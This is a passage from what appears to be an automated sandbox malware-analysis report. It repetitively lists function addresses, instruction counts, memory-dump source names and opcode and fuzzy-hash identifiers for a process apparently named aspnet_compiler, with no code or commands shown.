                                                      • Opcode ID: 298f58c2bbae3e71fdede44227513fbaee8c569ac827ad1c7da0b48132af55db
                                                      • Instruction ID: 16e1adf9f770c4e908be057ddb3885a2502f3d3cf24e06ed2c25ea920aa5fd61
                                                      • Opcode Fuzzy Hash: 298f58c2bbae3e71fdede44227513fbaee8c569ac827ad1c7da0b48132af55db
                                                      • Instruction Fuzzy Hash: 4F41C5B1901745CFC726EF28CA907A9B7B9FF54310F1482AFC4169B2A2DB30A981CF51
                                                      Function 01AEC8F9 Relevance: .1, Instructions: 116COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7d2cccfb10308fbc4200845de72cf6fb5c9ab91aa6760a70addb566fc0937987
                                                      • Instruction ID: 89c1aee0af6f832cf0b3353375be86a9c5900ee77b148408e703be7d21fff3bb
                                                      • Opcode Fuzzy Hash: 7d2cccfb10308fbc4200845de72cf6fb5c9ab91aa6760a70addb566fc0937987
                                                      • Instruction Fuzzy Hash: 513189B1A01345DFDB16DFA8D540799BBF0FB09B24F2081AED119EB291D7369902CF90
                                                      Function 01B307C3 Relevance: .1, Instructions: 114COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 90f500db5e9ea54e1db7eb73d810deac70ebec60b9ff8529601da745cb958e1c
                                                      • Instruction ID: 8a65f884cd0508fe88766cd9955ec4b6f3b3b4a7e0444620888f58df401b3be4
                                                      • Opcode Fuzzy Hash: 90f500db5e9ea54e1db7eb73d810deac70ebec60b9ff8529601da745cb958e1c
                                                      • Instruction Fuzzy Hash: FF418CB2504305AFD720EF29C845B9BBBE8FF88764F004A2EF998D7250D7709915CB92
                                                      Function 01AA80A0 Relevance: .1, Instructions: 111COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6b61faafb059b22a65f1406ef71abe1ec48b072113f312e3bbf2da2f6ed0201e
                                                      • Instruction ID: 92c2ea1b85008f683bb8e2df6a4c691a41317a86f0a25bc25bc1a09d45bdbee1
                                                      • Opcode Fuzzy Hash: 6b61faafb059b22a65f1406ef71abe1ec48b072113f312e3bbf2da2f6ed0201e
                                                      • Instruction Fuzzy Hash: 1A410371E05716AFCB01DF18CA80AA8BBB5FF44761F54826AD816A7280DB39FD41CBD0
                                                      Function 01B305A7 Relevance: .1, Instructions: 111COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f2c578f3f0d67e8eb11e0c03a9bd5d9928fe880c1ef716c526d270f20ca9a767
                                                      • Instruction ID: ba5c73de05bd021bf095422b8c4c3983c1dd43a55926518dbc4403d2e5702d1f
                                                      • Opcode Fuzzy Hash: f2c578f3f0d67e8eb11e0c03a9bd5d9928fe880c1ef716c526d270f20ca9a767
                                                      • Instruction Fuzzy Hash: 3341C2726086469FC324EF6CC880A7AB7E9FFC8700F14465DF95497680E730E914D7A6
                                                      Function 01AB4859 Relevance: .1, Instructions: 111COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 824c120597ebb1877538e39ebfb75caf71ccf82a6d1a364382c1b1a8c58a8d39
                                                      • Instruction ID: 6307f5bc0597b41b821b29e8c4fe163c40eeb80330d6159538a23536102952f7
                                                      • Opcode Fuzzy Hash: 824c120597ebb1877538e39ebfb75caf71ccf82a6d1a364382c1b1a8c58a8d39
                                                      • Instruction Fuzzy Hash: 0D41D2706043429BDB25DF2CD9C4BAABBE9EF88750F14442DE642CB293DB30D841CB91
                                                      Function 01AA8B50 Relevance: .1, Instructions: 111COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3b70069ce20c59b1e3c2b77f6c99d013aafabc417a585bf3473c8313b51d5294
                                                      • Instruction ID: e75d6ed2ee85a690ccdd40b172d9c8172cbb9d1e83e3f3f5f237ff8f0c4a85ca
                                                      • Opcode Fuzzy Hash: 3b70069ce20c59b1e3c2b77f6c99d013aafabc417a585bf3473c8313b51d5294
                                                      • Instruction Fuzzy Hash: D641A171E01605DFCB15CF69CA809ADBBF1FF88321B54866ED466A72A0DB38A941CF40
                                                      Function 01AC02E1 Relevance: .1, Instructions: 106COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                      • Instruction ID: 57af61b1d191fc76e6fe3a12cbea764df48ed9373136e6266d8d54d1e5e0f4be
                                                      • Opcode Fuzzy Hash: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                      • Instruction Fuzzy Hash: D0310235A04244EBDB128BA8CD84BDABFE8AF14750F0841AAF815D7352C7749884CBA0
                                                      Function 01B5E3DB Relevance: .1, Instructions: 105COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: da8c5adfbfc4e07e6d9970cffbe70b44d89e6000dd59c41dfcfe3cbb6761e5e3
                                                      • Instruction ID: 5b2c599e518f172a301707c4aca09ff9c5989357a63d1516390c894a7a5037e3
                                                      • Opcode Fuzzy Hash: da8c5adfbfc4e07e6d9970cffbe70b44d89e6000dd59c41dfcfe3cbb6761e5e3
                                                      • Instruction Fuzzy Hash: 4D31B975740706ABDB269F559D41FAFBAB8EF58B50F000068FA00AB291DBA4DD01C7A0
                                                      Function 01B64B4B Relevance: .1, Instructions: 104COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5117cd48beebf7c7d533175a9fa9d053b49fa182150e08248400247f2961cee6
                                                      • Instruction ID: f9fc6e26324f68dd98860424d1ee71133c2f5c3a077aa95fa97be11d7478c0e0
                                                      • Opcode Fuzzy Hash: 5117cd48beebf7c7d533175a9fa9d053b49fa182150e08248400247f2961cee6
                                                      • Instruction Fuzzy Hash: 583104722056019FC329DF2DD880E26BBE9FB90360F0944AEE9958B355DB35EC40CB81
                                                      Function 01AB4260 Relevance: .1, Instructions: 102COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ba0abafeeebc895ca43e064ff40a4915255fc830214cb8936e7c9ea7e7d478cb
                                                      • Instruction ID: d3fbcc592f3b80977e97a00ecc356fb1e73addb4932fdcf868c9f22ca7abf18a
                                                      • Opcode Fuzzy Hash: ba0abafeeebc895ca43e064ff40a4915255fc830214cb8936e7c9ea7e7d478cb
                                                      • Instruction Fuzzy Hash: D641BA71200B459FD726EF28C981BD67BE8AF48710F19846DF69A8B252C730E840CB90
                                                      Function 01B64BB0 Relevance: .1, Instructions: 101COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 98e192756eca3fc161b8bbbe4a62e9e317a0b95f34b4f638c9ebe8bae658dec7
                                                      • Instruction ID: 5de10049b25b5dc9e50800f0e8dc7ef65c8eb54aedc2308a4e95415781724df0
                                                      • Opcode Fuzzy Hash: 98e192756eca3fc161b8bbbe4a62e9e317a0b95f34b4f638c9ebe8bae658dec7
                                                      • Instruction Fuzzy Hash: 5F31AD716046019FD328DF28C881A2ABBE9FB94720F0945ADF9959B398E734EC04CB91
                                                      Function 01B2EB1D Relevance: .1, Instructions: 100COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 87e8f64d060ce657acae8f117e459f34bbcedaf9ede165fa7995e6b3467e09cf
                                                      • Instruction ID: 9b447427e9cc29a2056023cde4025a81e340aac004985ab11bb572dcd02c56eb
                                                      • Opcode Fuzzy Hash: 87e8f64d060ce657acae8f117e459f34bbcedaf9ede165fa7995e6b3467e09cf
                                                      • Instruction Fuzzy Hash: 1331D4316016A29BF72A579ECA8CB557BD8FF44B40F1D44E4EA49DB6D1DB28D848C230
                                                      Function 01B761C3 Relevance: .1, Instructions: 97COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e5f26ce685c4a52275ee2635dec711a4f9e1d13d1dcdef08395a25f46d04c679
                                                      • Instruction ID: 09cb233eaf5d235dd84ec00d7115ca053a9ce21e1052804b426b4cf61bafb758
                                                      • Opcode Fuzzy Hash: e5f26ce685c4a52275ee2635dec711a4f9e1d13d1dcdef08395a25f46d04c679
                                                      • Instruction Fuzzy Hash: DD31C175A0061AEBEB19DF98CD40BAEB7B5FB48B40F4541A8E910EB244D770ED41CBA4
                                                      Function 01B5483A Relevance: .1, Instructions: 96COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 21f9e117b351fc3732b754dd0d2fec934ecf3103aee4b41730d998277aae7513
                                                      • Instruction ID: eda013c3a14085aba0c361ca33d7b7ba74e7f93ec80f21d3b75a3146c2cb4b53
                                                      • Opcode Fuzzy Hash: 21f9e117b351fc3732b754dd0d2fec934ecf3103aee4b41730d998277aae7513
                                                      • Instruction Fuzzy Hash: 4A315076A4012DABCF61DF58DD85BDEBBB9EB98350F1000E5A908A7250DB30DE918F90
                                                      Function 01ADEB20 Relevance: .1, Instructions: 96COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2be5df44d1f56264a3da2576b89598dc478849ae9794be881559f8457c721145
                                                      • Instruction ID: f045fdd10523f231bcd8156174a126c646ef5150d259be13771c82fecd5e5fdb
                                                      • Opcode Fuzzy Hash: 2be5df44d1f56264a3da2576b89598dc478849ae9794be881559f8457c721145
                                                      • Instruction Fuzzy Hash: D031A972E00615EFDB21DFA9CD40AAEBBF9EF44750F118569E516EB250D770AE00CBA0
                                                      Function 01B760B8 Relevance: .1, Instructions: 95COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: df45109af52007c141f01f18fc27a6437b7afd2fbb60f567ee03995ca4c724a6
                                                      • Instruction ID: 7ad9c1232f84f36f48b3e2131f6fa4bc7a97d27ea696b584c12b246bd482721e
                                                      • Opcode Fuzzy Hash: df45109af52007c141f01f18fc27a6437b7afd2fbb60f567ee03995ca4c724a6
                                                      • Instruction Fuzzy Hash: FD31F471B00A06EFEB1A9FAAD840B6AB7F9EF44750F0040ADE515DB752DB70DC008B90
                                                      Function 01AB07AF Relevance: .1, Instructions: 95COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a5e305af1649759a18dc508c54ca5ef4d25bc15b3ddb2552a1b9122cb782add9
                                                      • Instruction ID: 515b189de913bd4bb230e380c5f1b68042076e18f9dc6350f606521ba02bf3ac
                                                      • Opcode Fuzzy Hash: a5e305af1649759a18dc508c54ca5ef4d25bc15b3ddb2552a1b9122cb782add9
                                                      • Instruction Fuzzy Hash: 8F31F672A04782DBC723DE68CAC0AABBBB9AF94650F05452DFD55A7212DB30DD0187E1
                                                      Function 01AB8550 Relevance: .1, Instructions: 94COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9fbf0de82dff354d25451fc2e2c3719f03be7c4ab1f0f233d921c7536793c968
                                                      • Instruction ID: 2539827834354a7fad991c9a6f03b5143a72c0ec6ffb0d7157a841dd5f98f41f
                                                      • Opcode Fuzzy Hash: 9fbf0de82dff354d25451fc2e2c3719f03be7c4ab1f0f233d921c7536793c968
                                                      • Instruction Fuzzy Hash: 5531CC716083418FE324CF1DC884B6ABBE9FB98700F554AADF9889B355D374E904CB91
                                                      Function 01AEA6C7 Relevance: .1, Instructions: 92COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                      • Instruction ID: 130886a4c84bf780efd90bd13ab243a22f31c8065d7e4acd4bbef4826023a8eb
                                                      • Opcode Fuzzy Hash: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                      • Instruction Fuzzy Hash: EF312CB2B00B11AFD765CF69CE44B57BBF8BB08B50F04052DE59AC3650E630E9008B60
                                                      Function 01B5EBD0 Relevance: .1, Instructions: 91COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 535454ebfef395395e783bc86a66152be061f6735a97b695147fbc864cc03c61
                                                      • Instruction ID: fe294fd5e172f20629eb88ff8ead28d5b288c7b429a0f6e548fc9215e161a28b
                                                      • Opcode Fuzzy Hash: 535454ebfef395395e783bc86a66152be061f6735a97b695147fbc864cc03c61
                                                      • Instruction Fuzzy Hash: 8D31BAB15093018FCB19DF19C640A6AFBF1FF89614F4449EEE8989B211D730DA44CB92
                                                      Function 01AD438F Relevance: .1, Instructions: 89COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c2b624de2791c1d32c0609810d3e96b2c2cb653baef808151d6466520528ea5f
                                                      • Instruction ID: a7fe1e19348b0bd60cfebb3896656cbf4c8c7efd9992f158534c2d2c075e253b
                                                      • Opcode Fuzzy Hash: c2b624de2791c1d32c0609810d3e96b2c2cb653baef808151d6466520528ea5f
                                                      • Instruction Fuzzy Hash: A13138B1B006058FDB24DFB8CA81AAEB7F9FF98304F04842AE116D3A55D730D981CB90
                                                      Function 01AACB7E Relevance: .1, Instructions: 89COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
                                                      • Instruction ID: 3e2c5d8372d0560da987ce11361527cb8d3d5cc27d235d43efe2e048df302fc1
                                                      • Opcode Fuzzy Hash: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
                                                      • Instruction Fuzzy Hash: 87210432E4025AAAEB119FB9C840BFFBBB5EF14790F0584759E55E7380E370C90087A0
                                                      Function 01AAC156 Relevance: .1, Instructions: 88COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a12bcc987e6bdf3e418c7f7c63e933e22718c65bde15af29cb905e2570249d14
                                                      • Instruction ID: 004f74905d75b4738ee38ce096dccf772497dc540524db565b2240244498b398
                                                      • Opcode Fuzzy Hash: a12bcc987e6bdf3e418c7f7c63e933e22718c65bde15af29cb905e2570249d14
                                                      • Instruction Fuzzy Hash: 293149B15003018BDB26AFA8CC41BB97B74EF50714F9881E9E9459B3C2DB34D985CB90
                                                      Function 01B6C3CD Relevance: .1, Instructions: 88COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                      • Instruction ID: 18b8ca7b6f16d66823cbbcd201e449c370c0a0a800e6703d5efdab91fdac1dd4
                                                      • Opcode Fuzzy Hash: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                      • Instruction Fuzzy Hash: 30212B36600652A6CF19EB958840ABABFB8EFA0750F40805EFAE587691E73CD950C760
                                                      Function 01AAE420 Relevance: .1, Instructions: 88COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2bc87050c95744b88edbc769fba83095849cac1ead7bc44d8f59a09918452841
                                                      • Instruction ID: 3b4077d2ee7287a3f5ba2cc857a327bdba7264ed9f37acc0044bd54c2c5fcf41
                                                      • Opcode Fuzzy Hash: 2bc87050c95744b88edbc769fba83095849cac1ead7bc44d8f59a09918452841
                                                      • Instruction Fuzzy Hash: 4F31F431A0052D9BDB31DB28CD41FEEB7BDAB15740F4100A5E645A7291D771AE808FA0
                                                      Function 01AE4588 Relevance: .1, Instructions: 87COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                      • Instruction ID: eea9a19d8f712d309b161befb859d74c12fffa8f28943e35125259a89a7862b4
                                                      • Opcode Fuzzy Hash: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                      • Instruction Fuzzy Hash: 86219131A00609EBCB15DF58C984A8EBBF9FF4C714F108469EE25DB241D674EE058F90
                                                      Function 01AE44B0 Relevance: .1, Instructions: 87COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 87b481c096ddb9ff77d08d86643afa317f3f2ed425512d1a179b69377ad95e88
                                                      • Instruction ID: bfcf6fdc9ee084641fb078a2897375a7586fff68d609257b97f8db181c558397
                                                      • Opcode Fuzzy Hash: 87b481c096ddb9ff77d08d86643afa317f3f2ed425512d1a179b69377ad95e88
                                                      • Instruction Fuzzy Hash: 9721E1326047059BCB22DF68CA84B6B77E8FF8C720F054529FD589B641C734ED018BA2
                                                      Function 01AAE388 Relevance: .1, Instructions: 86COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                      • Instruction ID: 45b16e7e04d1b7ec7a044c88737f85c2065ee8fe493c587dc6f22c2d1466d7da
                                                      • Opcode Fuzzy Hash: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                      • Instruction Fuzzy Hash: B0319A31600604EFDB25CFA8C984F6AB7B9EF45354F1445A9E5128B281E734EE01CB50
                                                      Function 01B2E609 Relevance: .1, Instructions: 86COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 379f639dc154693a1b798f603faecc35ac20a9b711c3a7fb9235555ffdeb6a8e
                                                      • Instruction ID: 21868b0697dfd429cdef92f19ce56d1183951a7ea888220f28a54608345262a3
                                                      • Opcode Fuzzy Hash: 379f639dc154693a1b798f603faecc35ac20a9b711c3a7fb9235555ffdeb6a8e
                                                      • Instruction Fuzzy Hash: EC317C75600215DFCB2ACF1DC8849AEB7F6EF84304B194599F809AB391E771EA45CB90
                                                      Function 01B306F1 Relevance: .1, Instructions: 79COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 25b44963c1df974fc8ecdccfa5b23e53d2d57672604525af31c83013932845be
                                                      • Instruction ID: dea33e1943897f87e5e14c424749d3b4b49520fd3c001deda44696d8a55ed136
                                                      • Opcode Fuzzy Hash: 25b44963c1df974fc8ecdccfa5b23e53d2d57672604525af31c83013932845be
                                                      • Instruction Fuzzy Hash: 16218071A0012AEBCF25DF59C981ABEB7F4FF48740B5100A9F541A7240D738AD52CBA0
                                                      Function 01B3019F Relevance: .1, Instructions: 78COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 00276090c4f8b9158539659ce9ad16d30b4e901ef95b23b823050235768d1ed0
                                                      • Instruction ID: ac652f5a72d52b0ca964c3ad6583cbca0cfed64135593e75b66139f5b5d7902c
                                                      • Opcode Fuzzy Hash: 00276090c4f8b9158539659ce9ad16d30b4e901ef95b23b823050235768d1ed0
                                                      • Instruction Fuzzy Hash: 23219C71600645AFDB15EBADC940F6AB7A8FF88740F1440A9F904D7691D734ED50CBA8
                                                      Function 01B30283 Relevance: .1, Instructions: 74COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
